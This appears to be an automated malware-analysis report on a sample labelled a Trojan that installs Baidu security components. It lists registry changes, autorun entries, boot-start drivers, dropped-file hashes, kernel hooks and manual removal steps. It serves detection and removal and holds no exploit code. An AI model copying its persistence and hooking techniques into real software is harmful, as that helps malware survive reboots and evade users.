The process BaiduAnSvc.exe:3768 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 82 47 CB B2 28 84 0F 65 43 C6 B7 B0 8E E9 75"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process BaiduAnSvc.exe:3664 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 42 A9 9B D4 D3 8C 18 67 99 70 55 28 C0 D1 F9"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"INSTLANG" = ""

"InstallDate" = ""

[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_gj" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"Version" = "3.0.0.3971"
"InstallDir" = "%Program Files%\Baidu\BaiduAn"
"VirusTime" = ""
"SupplyID" = ""

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\BDEnhanceBoost]
"Start" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BaiduAnTray" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BaiduAnTray.exe -stmd=3"

The process BaiduSdSvc.exe:1500 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\bd0003]
"Group" = "FSFilter Anti-Virus"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Description" = "BDArKit"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"DisplayName" = "BDMWrench"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Type" = "1"
"Group" = "bddriver"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ImagePath" = "system32\DRIVERS\BDArKit.sys"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"ImagePath" = "system32\DRIVERS\BDMWrench.sys"

[HKLM\System\CurrentControlSet\Services\bd0003]
"ErrorControl" = "1"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Description" = "BDMWrench"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Services\bd0003]
"ImagePath" = "system32\DRIVERS\bd0003.sys"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Description" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢ÃƒÂ¥Ã…Â Ã…Â¸ÃƒÂ¨Ã†â€™Ã‚Â½ÃƒÂ§Ã‚Â»Ã¢â‚¬Å¾ÃƒÂ¤Ã‚Â»Ã‚Â¶"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Tag" = "5"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances]
"DefaultInstance" = "bd0003 Instance"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Type" = "2"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Type" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Group" = "bddriver"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Tag" = "3"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Altitude" = "326912"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DisplayName" = "BDArKit"
"Tag" = "4"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D1 47 09 53 FA 97 48 18 BF 47 64 39 0F 07 61 E3"

[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_sd" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = ""

[HKLM\System\CurrentControlSet\Services\bd0003]
"DependOnService" = "FltMgr"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"ErrorControl" = "0"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Flags" = "0"

[HKLM\System\CurrentControlSet\Services\bd0003]
"DisplayName" = "bd0003"

[HKLM\System\CurrentControlSet\Services\BDKVRTP]
"Group" = "COM Infrastructure"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ErrorControl" = "0"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Start" = "2"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"baidusdTray" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe -stmd=3"

"baidusdTray" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe -stmd=3"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0003]
"Start" = "1"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Start" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\BDMWrench\Security]
[HKLM\System\CurrentControlSet\Services\BDMWrench]
[HKLM\System\CurrentControlSet\Services\BDMWrench\Enum]

The Trojan deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\bd0003]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"DeleteFlag"

Dropped PE files

MD5	File path
40bc0f5d3bb961b7b76276f0292fd708	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\F1023_s_30803.exe
9fa45f9017584f7a73f7359dad2caf26	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsk3.tmp\BDMSkin.dll
f1a3e3d2552723cf46f1e9aaa4741877	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsk3.tmp\GetSupplyId.dll
17c360226bee79f8e544907084f599e8	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsk3.tmp\KVInstallHelper.dll
40bc0f5d3bb961b7b76276f0292fd708	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\F1023_s_30803[1].exe
123df1ab69a1d32b42a9d6c797ac5447	c:\Program Files\Common Files\Baidu\BDDownload\108\7z.dll
c7ac6fdc3f233399708cdf5edb4f7343	c:\Program Files\Common Files\Baidu\BDDownload\108\bdcomproxy.dll
2ecb6110aade861f16c9ca210f3ea005	c:\Program Files\Common Files\Baidu\BDDownload\108\bddownloader.exe
2619bdb16bafaec8304fae07e459f321	c:\Program Files\Common Files\Baidu\BDDownload\108\dl.dll
9156ae112ea0989ef04dfe5e97f17b4e	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDConfig.dll
676835dc52b67fc7150e9c6336da6556	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDDriverFixer.dll
a0e2fc0daea50c40aba3c90db558bcce	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDLogicUtils.dll
9f1c8cf481b790de9cd2275505dd1bac	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVCached.dll
d9cce68f84f576bd244c91fb6df7d73d	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVEng.dll
bad438e36d73f20cb60e738fb9974198	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMBase.dll
89d798adf093aebaf041fd0197ede893	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMDownload.dll
34615a5c3ad5b59208d57674cb0f26fe	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMFrameWork.dll
dce4321312ff1fc63323d6b6a9f06522	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMLog.dll
c1ae08fe4bb466d651fdc4d3a943bdeb	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMMsg.dll
d4c2ce04bad7eb4d408118021e85dddb	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMNet.dll
cdb1722edcaf6a211344d80e30f2c295	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMPatchAgent.dll
06792f4af5c6d9b02be39ada55d2fbd7	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMReport.dll
ed5776988c1f89b6b3b24a3e174f1218	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMStringUtils.dll
605fcf4a03fe970725008fdaab511818	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMTinyXml.dll
6946e725d396a13c44529adbe63c4ecc	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMUpdate.dll
d280f73128561a62e8709fd81faa6097	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDPerflog.dll
0177e3ded91fa30a3514e642c215d277	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHips.exe
af88ec6399f527720b342482e1a03cb8	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsBugRpt.exe
92c3bc063c1fc4acf176b8e7364c96d7	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsIU.dll
734b342d7091f44c1deeeb8be3313a8c	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsUpdate.exe
9474fcb760cd07111a05a0159138b9d2	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\DriverManager.dll
ec1059187b4cd5cf1f3d743a8b2693ff	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\TrustAndIso.dll
ae6b6a43cead19395446ee132b787249	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll
1fc801576f8b397276245edf7039b427	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\bd0002.dll
04116475cff6d3305a8233c8342ffa88	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0001.sys
c39fa78d836fcc2c62d16bac891394f8	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0002.sys
85e228f2d13456e145dd756b4d7fc6e2	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.dll
d5402c14fd9a98a47614f2e8fdfdfbca	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.dll
947ccea3196c6d67babd6c4d5ca71d50	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.dll
3f40b1504d7696ba7341f7ba465e3b56	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.dll
1c7a49db64849cdfaf0d9010661e6385	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.dll
9b664677838ed675f52337e910e0dc6c	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.dll
3b4ef9c679537e2632ffbdbb0186f1b0	c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.dll
bd41d5bb8e1a290fc17cb963522c0099	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavCommon.dll
1b8c4af1ac0cee8301b10e5aa15751e7	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavEngine.dll
f01e5681328e98ea61465eb3d894078e	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavFrame.dll
2794ecd5040fcd59772d215c10f56470	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavScanH.dll
fd875b7677013cb59776fb1633c061bc	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavScanM.dll
0f893b451ce2e3dcc6fb17eb6ddf7e43	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavScanS.dll
6075d26c90a855f6a852f435d8e695eb	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavScanV.dll
d1fdc340269ec3326eee750ff8bc359b	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDConfig.dll
923cc6aaf4c48002c1c96faa77367071	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDCooly.dll
4f2cfb572029ac7bea92412b3f18670d	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDDriverFixer.dll
c5533d7d431938cf63ae27bb7cd561cc	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand.dll
31dd6c0b6da00047dcc24faa1fcb3c46	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand64.dll
7169568c9d40e606231eda197db86d9f	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect.dll
79e8dc5bff7304f2e749bd7a3ede966e	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect_x64.dll
d0352acd1acbb264b93a4d4718115ce2	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVMainFrame.dll
87b28b0d55af94230442446ae6073be7	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVRecomm.dll
8ec7a9dade53bc0ea8d6b65f564e21c7	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVWsc.exe
5510bdc5bae1f0cc430b7b32c7948bb0	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDLogicUtils.dll
359bbf27d9f71185351ea635202ebed3	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMAVE.dll
3fe09f45335f290cad98e80ea59893fb	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMDbSqlite.dll
28f81cdb8871f62237efc4750df5e54f	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMDownload.dll
68e4ebe183d32eff69d83aca52fdb335	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMEvents.dll
2ae0a5334f559ba4f1944a2e60de2778	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMFrameWork.dll
fff0616db65911080007bac98e198854	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMNet.dll
047bfa4e2dd76866c2497433efee37cd	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMPatchAgent.dll
e4ad30b794a43e48da82eb66de87d316	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMReport.dll
0b0edc38e7ac2c378bb79ab62375eef1	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMSDWrench.dll
c7087e78c232b8919990539953a2d2c7	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMScriptVM.dll
b8e15a6d8b5208a0d0dee8b93dbf2160	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMSkin.dll
fbcf33e8388bcadd5a98186cb1a954a5	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMUpdate.dll
ac39daf741186cac2cb39967bf3f3ed4	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMWindowsLib.dll
f106d55b6b37793829dfee5b03a4917d	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDPerflog.dll
39ad853ef66059994900e083e9fa4a8b	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDShellExt.dll
c44bc8da33cae81d76fdd4a0285dc28e	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDShellExt64.dll
3f34b9074ffa20a4712fbc2bde5df727	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe
48ec40617c6b7d7d319f0648dc1e43b0	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe
6a9766f5b15ce63bca734cf0da6b9c09	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdRepair.exe
89418d3900eb4a2f0a8711f476c4b5ce	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe
656e264a38633623ae060e29578e2129	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe
2d79c25c5c36081f9be5a644616b523b	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdUProxy64.exe
e9babe25db0493a84c8854b831ca63bd	c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe
23e5fbdc96d55dfb9a26e36081a5569f	c:\Program Files\baidu\BaiduSd\2.1.0.3086\DesktopToast.exe
97576609781bf4d4fdb916a4b2352540	c:\Program Files\baidu\BaiduSd\2.1.0.3086\DriverManager.dll
af91977a6e11df402f8318cb286fdfc3	c:\Program Files\baidu\BaiduSd\2.1.0.3086\GCCallbackBind.dll
733f326a12b12ce6e628ffd9d7fba47a	c:\Program Files\baidu\BaiduSd\2.1.0.3086\GCCommunicate.dll
815632cea661098fafc34400a8a4d42e	c:\Program Files\baidu\BaiduSd\2.1.0.3086\GCScriptBind.dll
379704add22ef7576ee44cae85b39242	c:\Program Files\baidu\BaiduSd\2.1.0.3086\KVFixerConfigMgr.dll
c30f5e1c544a396079a91ee0133971a3	c:\Program Files\baidu\BaiduSd\2.1.0.3086\ad.dll
df636a0b62a7b2627fc9b2d350b4bc97	c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDKitUtils.dll
a6b8d4596009dfdae37bcc14d9904201	c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVCached.dll
98bf84947e98aa85d22f8a0144bbf7f9	c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVEng.dll
400aa2fc8af4b6b251ecfea115d5aaad	c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMPerfMon.dll
d1eab731b9eb18c4b13000b9a1c3d84e	c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepBase.dll
09829203238dca6f960c9e30aac4dfaf	c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepMgr.dll
997a38d43d043e31c8f4550793a81b74	c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDUDiskGuard.dll
20ac34370b7e1780339cbfd3b085a6a4	c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\CompatibilityChecker.dll
09809686fef1a0db344d839a72b2f7ae	c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\KavUpdate.dll
6ae8aa8348ed430cae50efb884be5193	c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\TrustAndIso.dll
d2b5c85c7708a619acc60c518bb451ac	c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\bduf.dll
ab5e37a075539acb8976b7d7eb649222	c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSRCore.dll
8c35a808addc5877258a03af691c30be	c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSREng.dll
2619bdb16bafaec8304fae07e459f321	c:\Program Files\baidu\BaiduSd\2.1.0.3086\dl.dll
34e11d25672bdf576c0bf780ee757ec5	c:\Program Files\baidu\BaiduSd\2.1.0.3086\drivers\BDArKit.sys
b6edb1e0321c5f2f75352832ce21b507	c:\Program Files\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys
233c96e5369ef4b58ab606c2b150b65a	c:\Program Files\baidu\BaiduSd\2.1.0.3086\drivers\bd0003.sys
9156ae112ea0989ef04dfe5e97f17b4e	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDConfig.dll
676835dc52b67fc7150e9c6336da6556	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDDriverFixer.dll
a0e2fc0daea50c40aba3c90db558bcce	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDLogicUtils.dll
9f1c8cf481b790de9cd2275505dd1bac	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVCached.dll
d9cce68f84f576bd244c91fb6df7d73d	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVEng.dll
bad438e36d73f20cb60e738fb9974198	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMBase.dll
89d798adf093aebaf041fd0197ede893	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMDownload.dll
34615a5c3ad5b59208d57674cb0f26fe	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMFrameWork.dll
dce4321312ff1fc63323d6b6a9f06522	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMLog.dll
c1ae08fe4bb466d651fdc4d3a943bdeb	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMMsg.dll
d4c2ce04bad7eb4d408118021e85dddb	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMNet.dll
cdb1722edcaf6a211344d80e30f2c295	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMPatchAgent.dll
06792f4af5c6d9b02be39ada55d2fbd7	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMReport.dll
ed5776988c1f89b6b3b24a3e174f1218	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMStringUtils.dll
605fcf4a03fe970725008fdaab511818	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMTinyXml.dll
6946e725d396a13c44529adbe63c4ecc	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMUpdate.dll
d280f73128561a62e8709fd81faa6097	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDPerflog.dll
0177e3ded91fa30a3514e642c215d277	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHips.exe
af88ec6399f527720b342482e1a03cb8	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsBugRpt.exe
92c3bc063c1fc4acf176b8e7364c96d7	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsIU.dll
734b342d7091f44c1deeeb8be3313a8c	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsUpdate.exe
9474fcb760cd07111a05a0159138b9d2	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\DriverManager.dll
ec1059187b4cd5cf1f3d743a8b2693ff	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\TrustAndIso.dll
ae6b6a43cead19395446ee132b787249	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0001.dll
1fc801576f8b397276245edf7039b427	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0002.dll
94e2246531b2e5c3319da7ab79372d2f	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0001.sys
d1895f7555fff550e20bbf92146e17cf	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0002.sys
04116475cff6d3305a8233c8342ffa88	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0001.sys
c39fa78d836fcc2c62d16bac891394f8	c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0002.sys
c1813f32fc06301e61efbe211a9ba0b8	c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\BDKVVirusPlugins.dll
d23f519d7040466c22c445ba8dc070cf	c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\FileMon.dll
2d0bc8fe5f19a79f57b68fc9f61b9581	c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\HIPSClient.dll
15844bec40eefc0f55dbfcb2b44cfb63	c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\PrivacyProtect.dll
23af09ab60487fb5a8a2eb18c36d77ad	c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDDownLoadProtectPlugin.dll
9d7de59974d1acb3962ab3ed13b07fd0	c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll
d05545121c7f40e0c638fc720e28d90d	c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVTrayTipsPlugin.dll
4467b02c43945f67a4f98e9b9da41dd0	c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\UserDetectionPlugin.dll
ea98336db5a7c2da6b313c807e53b07f	c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\baidusdRepair.dll
7dfcbea77e16c3a4b74935b87b129d4e	c:\Program Files\baidu\BaiduSd\2.1.0.3086\uninst.exe
485de987ac7faa82da2134263249eff0	c:\Program Files\baidu\BaiduSd\2.1.0.3086\updlog.dll
ac2583ae7c8e129febe9fb92b814a663	c:\Program Files\baidu\BaiduSd\2.1.0.3086\websafe\DllInject.dll
ae9050fccdf1f8cb3755ead6bf6f254a	c:\Program Files\baidu\BaiduSd\2.1.0.3086\websafe\WebMonBHO.dll
16df69d9edd8b09a6f5be1c8dee939f7	c:\Program Files\baidu\BaiduSd\2.1.0.3086\websafe\WebMonHook.dll
47794c331f77bbf0e3087938c7a77d23	c:\Program Files\baidu\BaiduSd\2.1.0.3086\websafe\WebSafe.dll
621bdedf43439f422be371e971bd802a	c:\Program Files\baidu\BaiduSd\2.1.0.3086\websafe\WebSafePlugin.dll
7f67d6cf6dd6ac289fc2255ff02b0833	c:\Program Files\baidu\BindEx.exe
ac12c71ef1d4b33819b85c158790d8d1	c:\Program Files\baidu\unins000.exe
3e9a33113d663d8bd5ed38858e669652	c:\WINDOWS\WinSxS\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd\ATL80.dll
75f2a9b695ef3ef22d731f059920f636	c:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcm80.dll
8c53ccd787c381cd535d8dcca12584d8	c:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcp80.dll
1169436ee42f860c7db37a4692b38f0e	c:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcr80.dll
34e11d25672bdf576c0bf780ee757ec5	c:\WINDOWS\system32\drivers\BDArKit.sys
b6edb1e0321c5f2f75352832ce21b507	c:\WINDOWS\system32\drivers\BDMWrench.sys
04116475cff6d3305a8233c8342ffa88	c:\WINDOWS\system32\drivers\bd0001.sys
c39fa78d836fcc2c62d16bac891394f8	c:\WINDOWS\system32\drivers\bd0002.sys
233c96e5369ef4b58ab606c2b150b65a	c:\WINDOWS\system32\drivers\bd0003.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls creation and closing of processes by installing the process notifier.

Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls creation and closing of threads by installing the thread notifier.

Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.

The Trojan installs the following kernel-mode hooks:

ZwUnloadKey

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):
F1023_s_30803.exe:780
BaiduHips.exe:3260
BaiduHips.exe:320
netsh.exe:2640
BDKVWsc.exe:2568
BDKVWsc.exe:2668
RegSvr32.exe:2972
RegSvr32.exe:2256
RegSvr32.exe:560
RegSvr32.exe:1232
RegSvr32.exe:2360
bddownloader.exe:2600
bddownloader.exe:3792
G1023_s_70904.exe:3576
%original file name%.exe:716
BaiduSdTray.exe:2844
BaiduAnTray.exe:3824
setup.exe:1056
cacls.exe:1860
MsiExec.exe:548
MsiExec.exe:1968
BaiduAnBugRpt.exe:916
BDASWDeskGuide.exe:228
baiduanTray.exe:3012
BindEx.exe:1568
BindEx.exe:1040
setup.tmp:1976
regsvr32.exe:2652
regsvr32.exe:1520
regsvr32.exe:2920
